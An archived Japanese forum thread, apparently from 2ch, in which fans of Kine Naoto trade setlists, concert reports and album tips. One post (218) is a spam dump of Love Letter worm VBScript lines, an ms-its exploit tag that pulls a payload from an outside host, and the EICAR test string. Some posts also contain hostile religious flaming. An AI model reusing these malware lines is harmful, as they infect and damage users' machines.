クローバー
こぶし
----
ゲストコーナー
----
UNKOWN TOWN
ポニーテール
風に抱かれて
Don't Turn Away
Running on
空につづくロマンティック

アンコ i



161 :NO MUSIC NO NAME:2006/05/05(金) 00:21:56 ID:f4oJsU7q
ゲストコーナー
3日
小室みつ子
You’ve Got a Friend(みつ子vo 木根G)
Girl Frienfd(みつ子vo 木根G)
花の咲く星(みつ子オリジナルVo 木根G)
※↑FCのリクエストハガキ読み上げ

4日浅倉大介
異邦人 (木根G,Vo 浅倉ピアニカ)
さくらの花の咲く頃に(木根G Vo、浅倉Key)
パノラマジック (木根G,Vo 浅倉ピアニカ)

162 :NO MUSIC NO NAME:2006/05/05(金) 18:03:04 ID:w0gkBe64
3日 小室みつ子
TIME TO COUNTDOWN(木根Key&ギターソロ みつ子Vo)
GET WILD'89(木根Vo みつ子Key&サンプリングパフォーマンス)
GIRL FRIEND(木根G&Cho みつ子Vo)

4日 浅倉大介
Quantum Mechanics Rainbow 1〜7 (浅倉Key 木根Talk&ハガキ紹介)
レヴェランス(木根Vo&G 浅倉ピアニカ)
Red coder “anemone”
'Deep blue'Resolution
Puppet Master
(3曲続けて木根G&Vo 浅倉Key)

163 :NO MUSIC NO NAME:2006/05/05(金) 18:23:34 ID:6FrYvozF
>162
これ激しく見たいw

164 :NO MUSIC NO NAME:2006/05/05(金) 22:41:17 ID:XskxCBZp
5日→千綿ヒデノリ
69/99 (vo.&g木根&千綿)
友よ (千綿オリジナル曲、vo.&g千綿 見学w木根)
Dragon the Festival (vo.木根 g千綿 key慎吾)

165 :NO MUSIC NO NAME:2006/05/05(金) 22:55:31 ID:w0gkBe64
6日 宇都宮隆 小室哲哉 葛城哲哉

SCREEN OF LIFE
(宇都宮Vo/小室ツマミ/葛城G)
JUST ONE VICTORY
(宇都宮Vo/小室ツマミ/葛城G)
新曲
(宇都宮Vo/小室ツマミ/葛城G)

166 :NO MUSIC NO NAME:2006/05/05(金) 23:48:33 ID:I4fpQAXl
宇都宮と木根と葛Gと小室の新曲が知りたい

167 :NO MUSIC NO NAME:2006/05/06(土) 00:15:55 ID:dNatGLtG
>166
165以外は皆木根さんのパートも書いてあるけど165は木根の木の字も無いってことは、ひょっとして木根さん抜きなのでは?

168 :NO MUSIC NO NAME:2006/05/06(土) 00:34:22 ID:pF/aGLye
ああ、木根抜きのT…

169 :NO MUSIC NO NAME:2006/05/06(土) 18:52:22 ID:uNPHeEh4
5日のSPCの招待席に座ってた男女は有名な方ですか?

170 :NO MUSIC NO NAME:2006/05/07(日) 00:20:00 ID:RfR4g6vZ
>>169
そういうあなたはキネファンじゃないのかな?
男性の方は中村シュウちゃん。サポギタリストで、Lifeのアレンジャー。
女性はシュウちゃんのツレみたいだね。

171 :169:2006/05/07(日) 00:35:32 ID:MvkWiLAl
>>170
ありがとうございました。


172 :NO MUSIC NO NAME:2006/05/08(月) 01:43:03 ID:JDpsHxSf
そうはいかんざき

173 :NO MUSIC NO NAME:2006/05/09(火) 20:41:50 ID:lAtYhtoD
>>162
吹き出してしまった

今回のネット配信ですっかり虜モードです。
思い切った企画して正解だったと思う。
戻ってくる人、いると思うよ

174 :NO MUSIC NO NAME:2006/05/12(金) 23:05:37 ID:qh/ogXjN
ライブの年齢層はどんな感じですか?

昔からのファン30代が主と思っていいですか?
行ってみたいのですが。
私は30代前半です

175 :NO MUSIC NO NAME:2006/05/12(金) 23:23:04 ID:zFRvt8My
全然おk

176 :NO MUSIC NO NAME:2006/05/12(金) 23:55:33 ID:qh/ogXjN
>>175
ありがとうございます。
チケット取ります!


177 :NO MUSIC NO NAME:2006/05/13(土) 00:53:53 ID:0Gk4KnmP
ファン層の中心は>>174の思ってる通りだよ。

行ったらレポヨロ。
木根スレで話が盛り上がらないんで寂しいよ。

178 :NO MUSIC NO NAME:2006/05/13(土) 22:04:25 ID:Rk2swyhH
名古屋の6月のチケットを買いました。
午後の部を買ったのですが整理番号が110番台でした。

先日のGWのネットラジオで戻ってきました。学生時代TM一色でした。

179 :NO MUSIC NO NAME:2006/05/14(日) 00:46:51 ID:2FKds3Pg
おかえり。
そんな番号がまだ買えることに驚きw。

180 :NO MUSIC NO NAME:2006/05/14(日) 01:36:28 ID:CUAud92h
でも東京はソールドアウトでしょ?

181 :NO MUSIC NO NAME:2006/05/14(日) 02:28:02 ID:2FKds3Pg
うん 東京は完売

182 :NO MUSIC NO NAME:2006/05/14(日) 12:42:20 ID:5X86u2iO
仙台はゲストコーナーだった所にリクエストコーナー
夜空ノムコウ
Time Passed Me By
Close to the night

夜空ノムコウをリクエストしたやつがたまたま木根さんの目の前に座ってて
次からはハガキ読みあげるたびに確認してたw

183 :NO MUSIC NO NAME:2006/05/14(日) 21:15:27 ID:2FKds3Pg
アリ
いいなー、リクエスト3曲かぁ。全公演行きたい。

184 :NO MUSIC NO NAME:2006/05/14(日) 22:06:06 ID:CUAud92h
ねー名古屋公演ってぴあに検索引っかからないよね?

185 :NO MUSIC NO NAME:2006/05/15(月) 06:41:23 ID:HYEeOXBR
>>184
私はピアの窓口で買いましたよ

186 :NO MUSIC NO NAME:2006/05/17(水) 09:29:52 ID:JKdXgZWf
Remember Me?のアルバムは最高だと思う21の夜

187 :NO MUSIC NO NAME:2006/05/17(水) 19:35:10 ID:WH2dWmMR
いや真に神なのはBeginnig Place

188 :NO MUSIC NO NAME:2006/05/19(金) 21:28:26 ID:sLYiS3hI
えっ!消えてゆく街とルンニOnで、はまり気がついたら半年で全てCDが揃ってしまった僕は変人デッカ?特にろじゃむ時代の音が!あっ歌声はLifeが1番かと…最近の木根君は年相応、苦労と経験を身につけ→僕ら的にはずっとついていきたいレス

189 :NO MUSIC NO NAME:2006/05/21(日) 11:43:06 ID:CAyr9zpK
チケットを買った者です。アルバム買いました。近くの店になかったので
ネットで取り寄せました。歌詞を改めて読むと、メッチャ良いですね。
なんか泣けるなぁ。

190 :NO MUSIC NO NAME:2006/05/21(日) 14:18:19 ID:QqVh1xBo
作詞家木根尚登も悪くはない。なんだかんだ言っても作詞作曲ヴォーカルと出来る旦那が一番地味に生きて行ける。

191 :NO MUSIC NO NAME:2006/05/21(日) 17:13:58 ID:CAyr9zpK
幸いにもサングラスで年をとってもあまり分からないし、
声質が劣らないのがエライ。


192 :NO MUSIC NO NAME:2006/05/22(月) 02:19:08 ID:qzkTiBWq
ひだまりも良かったよ

193 :NO MUSIC NO NAME:2006/05/22(月) 06:47:22 ID:LonLm0xS
>>192
板違い

194 :池田マンセー:2006/05/22(月) 23:55:52 ID:lhlPQa9e
>>1-193

層化信者乙


195 :NO MUSIC NO NAME:2006/05/23(火) 03:27:08 ID:FSa491XR
>>194

水奈々樹ヲタは(創価)の工作員

196 :NO MUSIC NO NAME:2006/05/24(水) 00:57:11 ID:XzCIhUws
水樹奈々とかゆうアニメ声優のヲタぶん殴ってやりたい
マジでウザイから!

197 :NO MUSIC NO NAME:2006/05/24(水) 07:28:41 ID:uvOTiF/U
こことソロ板で書いてるへきるヲタは消えうせろ

198 :NO MUSIC NO NAME:2006/05/24(水) 11:08:17 ID:qPwyEleB
最近久っ々に彼の曲を聴いてとても癒された自分。
しかしBeginning PlaceまでのALBUMは全部持ってるけど
ソレ以降のはサッパリ分らん状態だったりする。
そんなわたくしめに
「コレだけは押さえとけ!」的なALBUMを教えてくれないだろうか?

199 :NO MUSIC NO NAME:2006/05/24(水) 20:53:43 ID:Fbgy0/+V
最新アルバムの「Life」
杵タン的にもかなり力入れてるよ。

200 :NO MUSIC NO NAME:2006/05/24(水) 23:35:32 ID:cHklEtPU
737 名前:名無しさん@お腹いっぱい。[] 投稿日:2006/05/24(水) 22:16:49 ID:+5+OH3Xz0
アタマの悪いおまえらには
これがいちばんわかりやすいだろう↓
ttp://www.rondan.co.jp/html/mail/0312/031201.html


ほかにもこういうのがあるから、まあ読んでみれ。
おまえらの大好きな“ダンナ”がいる組織はこういうところ↓
ttp://3.csx.jp/peachy/data/korea/korea3.html
ttp://park8.wakwak.com/~kasa/Religion/soukagakkai.html
ttp://www15.ocn.ne.jp/~oyakodon/newversion/sokakitacho.htm
ttp://www5f.biglobe.ne.jp/~kokumin-shinbun/index7/00711souka-gakkai.html
ttp://bird.kakiko.com/n04u06/

201 :NO MUSIC NO NAME:2006/05/24(水) 23:58:59 ID:cHklEtPU
ttp://www.youtube.com/watch?v=q88SRNSNfZY
ttp://www.youtube.com/watch?v=jW9LkVLNUyk
ttp://www.youtube.com/watch?v=l2gJFbTz6N8





202 :NO MUSIC NO NAME:2006/05/25(木) 00:27:44 ID:NuBWE5tA
ダンナもヘキル嬢も変なのに付きまとわれていい迷惑だろうね

203 :NO MUSIC NO NAME:2006/05/25(木) 11:00:24 ID:7vEVv58j
>>202
板違い

204 :NO MUSIC NO NAME:2006/05/25(木) 21:02:16 ID:oBtRfZ58
>>198
ご存知だと思いますが
ttp://www.mumix.net/index.html
で、木根さんのアルバムLifeが聞けます。
私はそれでアルバム買った。
素敵ですよ。うっとりです。

205 :NO MUSIC NO NAME:2006/05/26(金) 00:42:08 ID:FLgXzI2l
俺のお勧めはHello Mr.Aloneだな。
また誰かを〜すきーになるー

206 :NO MUSIC NO NAME:2006/05/31(水) 13:42:04 ID:YD9426Tw
>>191
声はだんだん貧弱になってる気がする。
声が響くというより震えてた。あえてそういうふうにうたってるのかなあ?
久しぶりに聞いたとき、むなしくなった。

207 :NO MUSIC NO NAME:2006/06/03(土) 20:31:20 ID:mZejmuvF
あーちゃん!

208 :NO MUSIC NO NAME:2006/06/10(土) 16:24:01 ID:JMFFHDsg
TM卒業てマジ?

209 :NO MUSIC NO NAME:2006/06/10(土) 20:38:02 ID:fLq12vvf
ここはソロ板です。
板違い

210 :NO MUSIC NO NAME:2006/06/10(土) 22:39:14 ID:dKAEcnZ6
Close to the night は名曲だな('∀`)

211 :NO MUSIC NO NAME:2006/06/11(日) 23:30:51 ID:I/25u1hT
それ(・∀・)イイ!
ヽ(゜∀゜)ノ てんだねす

212 :NO MUSIC NO NAME:2006/06/13(火) 01:00:44 ID:0vR+lLWG
W杯日本戦、仕事ほっぽり出して見てたそうですが
負けちゃいましたねw

213 :NO MUSIC NO NAME:2006/06/17(土) 19:48:22 ID:sIqqIsgQ
来週、名古屋のライブに行きます。
ソロになって始めていくのですが、客席からのベストポジションは
どのあたりでしょうか。


214 :NO MUSIC NO NAME:2006/06/20(火) 23:00:15 ID:qy777D9Q
>213
会場が狭いから、横にうるさいツッコミをするヤシや前の席で人形をふってアピールする
ヤシとかいなければどこでも見やすいと思う
運だな
名古屋からはサポもいなくて杵たんひとりだから、マイクの位置を見ながら
調整するといいんじゃね?
譜面台があるから最前列ど真ん中は意外と見にくいらしい
音に関してはどこでもあまり変わらないような・・・
自分はその日の杵たんの歌いかたのほうが気になるから、音の聞こえかたは
あまり気にしたことがないので誰か分かる人フォローよろ


215 :NO MUSIC NO NAME:2006/06/21(水) 06:51:58 ID:dg4B/UyV
>>214
ありがとうございます。譜面台の事は頭にありませんでした。
楽譜を置くことも考えて、正面は控えます。スタンド位置を見ながら
移動します〜。

216 :213:2006/06/24(土) 20:38:00 ID:CqamJI+1
行ってきました!
ゲストの部分は「そして僕は途方に暮れる」「長い影」もう一つは失念
夏からレコーディングに入り、来年当たりに新曲を出したいけど
ファンの反応が気になるからライブで練習して(?)この歌なら
ウケがいいと言うのを出したいと弱音(笑いを取る)の発言。
来年はソロ15年だから皆の前で歌いたいし、中の良い人と(具体的に
名前出さず)一緒にやりたい、と言ってた。
サッカーは他の国と歴史の差を感じましたと言ってた。
大沢さんの「そして僕は…」の作詞が銀色夏生さんだけれど、
最初TMの「金曜日のライオン」も、銀色さんに作詞をお願いしたけど
煮詰まっちゃって出来なくて小室氏が書いたのです、と言ってた。
(銀色さんは短い詩が多いから金曜日のライオンは長くて大変だったと
思います)と言ってた

後ろの方の席でしたが、人の頭の間からキネさんの顔が見えてよかった。
しかし、変な発言を大声で叫ぶ人が近くに居て、そっちに神経を
もってかれました(涙)

217 :NO MUSIC NO NAME:2006/06/24(土) 21:43:22 ID:Th2ZhmqG
レポ乙
来年の活動も楽しみだね。
教えてくれてアリガト(*´Д`)

218 :NO MUSIC NO NAME:2006/07/02(日) 20:37:10 ID:BqAPxOMA
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"

219 :NO MUSIC NO NAME:2006/07/03(月) 11:35:02 ID:iGHkwYin
大阪いってきますた (・ω・`*)ヨー

220 :NO MUSIC NO NAME:2006/07/03(月) 19:54:50 ID:REbL2Tvi
>>219
おかえりなさい。
楽しかったですか?どんなトークがあったのでしょうか

221 :NO MUSIC NO NAME:2006/07/03(月) 20:58:30 ID:iGHkwYin
たらいまー。ええとねぇ、上のほうに書いてるみたいに15周年やから何かやりたいみたいな感じとTMやりそうな感じで歌ったのはライフの曲たくさんとpool on the planetとか月はピアノに誘われて。とか歌ってくれましたよ。僕はライブ自体二回目だったから楽しかったです

222 :NO MUSIC NO NAME:2006/07/03(月) 22:03:15 ID:zX7tIPY1
ちょwwww Fool やったのかよ。
裏山杉っっっっ

223 :NO MUSIC NO NAME:2006/07/03(月) 22:11:16 ID:REbL2Tvi
羨ましいーーー。foolですか!


224 :NO MUSIC NO NAME:2006/07/04(火) 01:44:24 ID:wGqSJAli
およよ人いるんですね
Foolは弾き語り風にやってくれましたよ。なんか弾き語りするような曲じゃないってゆってたけどやってくれました。あと君がいる朝とかみずきありさが歌う予定だったとかゆう話とかしてくれましたよ。話は沢山してくれました。
ただ会場せまくて椅子小さくて苦しかったです

225 :NO MUSIC NO NAME:2006/07/05(水) 14:48:25 ID:9vTRf4+q
観月ありさが歌う予定だった曲って何?
なんで無くなったの?
あとTMやりそうな感じだったの?
聞いてばかりでスマソ

226 : ◆TM.HP9pN8Y :2006/07/05(水) 17:27:30 ID:G50aCj7y
なんだっけ、えーとドラマ?かなんかで歌う予定で曲プレゼンして最終2曲までのこったけどアップテンポの違うほうがえらばれたらしいです。だから君のいる朝はちょうどTMが歌える環境にあったからTMの曲になったらしいですよ

227 :NO MUSIC NO NAME:2006/07/05(水) 17:29:16 ID:G50aCj7y
んでTMはやりそうな雰囲気を匂わしてましたよ。大人数のほうも企画があがってるみたいにいってました。ソロもおっきいことやるしウツもおっきいことやるだろうからみなさん(客)大変ですね。みたいにいってましたよ(´∀`)ノ

228 :NO MUSIC NO NAME:2006/07/05(水) 19:40:43 ID:NteBvkQ/
そ、そんこと言ったってもう期待なんかしないんだからねっ








ウソデス タノシミデス。


229 :NO MUSIC NO NAME:2006/07/05(水) 22:14:13 ID:9vTRf4+q
>>227
ありがとう。

でも杵め、何が皆さん大変ですね、だ!!
お前等のせいだっつーの!
でも良いものを届けてくれたら無条件で許すw

>>228
ツンデレもどき乙

230 :NO MUSIC NO NAME:2006/07/06(木) 22:13:25 ID:l3Ou6BTc
>226
採用された他アーの曲はなんだったんだろう…?

SHAKE YOUR BODY FOR ME?
PROMISE to PROMISE?
それとも、あなたの世代にくちづけを、かなぁ…?

231 :NO MUSIC NO NAME:2006/07/07(金) 17:30:49 ID:z24r3p9Z
>>130
ありさが小室の曲しか歌ってないと思ったら大間違いだぞ

232 :NO MUSIC NO NAME:2006/07/11(火) 21:18:14 ID:eeSPNmcb

LIVE PARK '06 木根尚登 SUMMER LIVE

会場: 東京・Tokyo PRINCE HOTEL 鳳凰の間(2F)(capa:450)
日時: 2006年08月18日(金) OPEN & BUFFET 18:30 / LIVE START 19:30

料金: ADV ¥15,000(in tax) DOOR ¥15,000(in tax)
※料金にはライブチケット・ブッフェ料理・お飲みもの・サービス料・消費税が含まれております。

プリンスドリームプラン料金 ¥24,000
※料金にはライブチケット・ブッフェ料理・お飲みもの・1泊・朝食・サービス料・消費税が含まれております。
※ツインルーム or ダブルルームを1室2名さまでご利用いただいた場合の1名さま料金です。
※1名さまでご利用の場合は¥7,000の追加となります。


一般発売日: 07月19日(水)より下記プレイガイドにて一般一斉発売を開始

 ☆Tokyo PRINCE HOTEL 03-3432-1111 http://www.princehotels.co.jp/tokyo
 ☆チケットぴあ 0570-02-9999(Pコード 235-727)
 ☆ローソンチケット 0570-084-003(Lコード 32129)
 ☆イープラス http://eplus.jp


233 :NO MUSIC NO NAME:2006/07/11(火) 22:43:17 ID:9DhOO+Sj
早急なTMの活動を期待します。

234 :NO MUSIC NO NAME:2006/07/11(火) 23:39:09 ID:12obXPZv
勘弁してちょ

235 :NO MUSIC NO NAME:2006/07/13(木) 16:49:25 ID:UXd8GbHy
本人降臨乙

236 :NO MUSIC NO NAME:2006/07/19(水) 23:27:48 ID:/jbKgHR4
2006年8月6日(日)
・イベントタイトル:東京富士美術館【名曲コンサート】
心に響く!〜 木根尚登トーク&ライブ
※大好き DAISUKI 犬と猫展期間中のイベントです。
・時間:13:30〜14:30
・会場:東京富士美術館
ttp://www.fujibi.or.jp/about/annai.html

237 :NO MUSIC NO NAME:2006/07/25(火) 02:18:52 ID:kcCldheZ
木根イイ

238 :NO MUSIC NO NAME:2006/07/25(火) 13:32:34 ID:usMB+xmv
あげ

239 :NO MUSIC NO NAME:2006/08/12(土) 07:20:54 ID:rLp9DzbU
創価辞めろやキモイし。

240 :NO MUSIC NO NAME:2006/09/03(日) 21:10:08 ID:O70XZqe4
トリビアに出るらしいな

241 :NO MUSIC NO NAME:2006/09/07(木) 22:06:43 ID:3Z5mtjD+
トリビア出演記念age

242 :NO MUSIC NO NAME:2006/09/21(木) 20:44:25 ID:z28gTP/V
トリビア出たの?ヘェ〜って叩いたの?

243 :NO MUSIC NO NAME:2006/09/24(日) 03:16:35 ID:5PA8topR
LIFE良かった
びっくりした

244 :NO MUSIC NO NAME:2006/10/23(月) 13:45:11 ID:DNP1QtBt
とりあえずage
T&Lスケジュールが合わん

245 :NO MUSIC NO NAME:2006/11/02(木) 15:40:29 ID:67Vpt3Ut
ここで創価叩きヤメレ!

246 :NO MUSIC NO NAME:2006/11/10(金) 22:37:35 ID:Cm75dqn0
南無妙法蓮華經 南無妙法蓮華經 南無妙法蓮華經

247 :NO MUSIC NO NAME:2006/12/01(金) 00:30:49 ID:9Az/9j5g


248 :NO MUSIC NO NAME:2006/12/05(火) 14:36:33 ID:tGMMm13i
初期の、きっと離れられない二人が好きなんだけど…。いや全曲好きだけどね。

249 :NO MUSIC NO NAME:2006/12/13(水) 00:30:10 ID:rt/GiFIq


250 :NO MUSIC NO NAME:2006/12/13(水) 18:26:39 ID:mW0uqKFq
こいつ、ギターどへただな

251 :NO MUSIC NO NAME:2006/12/14(木) 08:25:01 ID:J2eU+NTf
>>250
それなりに弾けてると思うが。
まあ上手いというより味のあるって感じだな。

曲に関しても同じ。小室は上手い。木根は味がある。

252 :NO MUSIC NO NAME:2006/12/14(木) 14:18:50 ID:opJBDD+i
今木根がうちの学校に来てて、目の前で喋ってる
職業について話してるよ
弾き語りするみたい
小室哲哉の真似してたw

253 :NO MUSIC NO NAME:2006/12/14(木) 18:48:12 ID:xmuKXDGe
木根さんうちの学校に来たんですが。職業講話で。

・・・ってアンタ都立M高校生ですか!?w>252

254 :NO MUSIC NO NAME:2006/12/15(金) 21:23:10 ID:vcbjow8O
12/23日 埼玉スーパーアリーナ 出演決定だと!

255 :NO MUSIC NO NAME:2007/01/19(金) 23:51:40 ID:fjJZt/pd
保守

今年50本ライブのうち何本行けるのだろう・・・

256 :NO MUSIC NO NAME:2007/01/22(月) 18:47:27 ID:bSP0zBrZ
先にトリで会える!


257 :NO MUSIC NO NAME:2007/01/27(土) 22:46:43 ID:WdU2jZO9
うつと中学の同窓会に出席したらしいよ


258 :NO MUSIC NO NAME:2007/02/03(土) 21:33:05 ID:kwC7qG5I
青空いい加減飽きた

259 :NO MUSIC NO NAME:2007/02/19(月) 05:03:28 ID:Kl+KfFxk
4月4日にアルバムが出ますよ

260 :NO MUSIC NO NAME:2007/02/19(月) 10:55:04 ID:I6lKTiNX
ホント?詳しく知ってたら何か教えて下さい。よろしく!

261 :NO MUSIC NO NAME:2007/02/19(月) 18:54:16 ID:dqiFQV+O
オフィシャルにあったよ

262 :NO MUSIC NO NAME:2007/02/21(水) 01:06:48 ID:dXrs9IlC
4月4日発売
ニューアルバム「道」
「TALK&LIVE 2006」のDVDも同時発売

263 :NO MUSIC NO NAME:2007/02/21(水) 07:15:12 ID:ZgLsvrtI
ありがとうございました!

49 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)